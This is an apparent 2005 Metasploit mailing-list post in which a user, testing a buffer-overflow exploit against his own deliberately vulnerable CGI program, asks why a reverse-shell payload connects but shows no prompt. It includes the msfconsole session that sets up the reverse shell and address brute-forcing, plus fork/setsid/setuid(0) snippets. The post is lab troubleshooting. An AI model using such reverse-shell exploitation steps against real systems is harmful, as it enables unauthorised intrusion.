Metasploit mailing list archives
Can't seem to get a shell prompt from linux_ia32_reverse
From: jwasser at skaion.com (John Wasser)
Date: Tue, 05 Apr 2005 16:46:25 -0400
As an exercise I created a CGI application (Apache under Fedora Core 3 Linux) with a buffer overflow vulnerability and a Metasploit exploit for it. The exploit works and the payload executes but when I use the linux_ia32_reverse payload I don't get a shell prompt. The Reverse Handler gets the connection but no prompt:

------------------------------------------------------------
[root at xxxxx framework-2.3]# ./msfconsole

+ -- --=[ msfconsole v2.3 [59 exploits - 69 payloads]

msf > use SkaionRegForm
msf SkaionRegForm > set PAYLOAD linux_ia32_reverse
PAYLOAD -> linux_ia32_reverse
msf SkaionRegForm(linux_ia32_reverse) > set LHOST localhost
LHOST -> localhost
msf SkaionRegForm(linux_ia32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Trying exploit target Fedora Core 3 Bruteforce
[*] RawPayload Length=70, EncodedPayload length=94, Nops=162, fullPayload Length=256
[*] Brute forcing bffff280 => bffff380 (step 161)...
[*] Trying bffff280...
[*] Trying bffff321...
[*] Got connection from 127.0.0.1:4321 <-> 127.0.0.1:35609
[*] Exiting Reverse Handler.

msf SkaionRegForm(linux_ia32_reverse) >
--------------------------------------------------------------

The time between "Got connection" and "Exiting Reverse Handler" is roughly a second.

I tried various code in PayloadPrepend() including binary for:

    if (fork()) exit(0);
    if (!fork()){if(fork())exit(0);}else exit(0); // Double Fork
    setsid();
    setgid(0);setuid(0);

and various combinations thereof...

In all cases I still got the reverse connection indicating that the payload code was executing but in no case did I ever get a shell prompt.

Any suggestions?

Apache: 2.0.52
OS: Fedora Core 3
/proc/sys/kernel/exec-shield = 0
/proc/sys/kernel/exec-shield-randomize = 0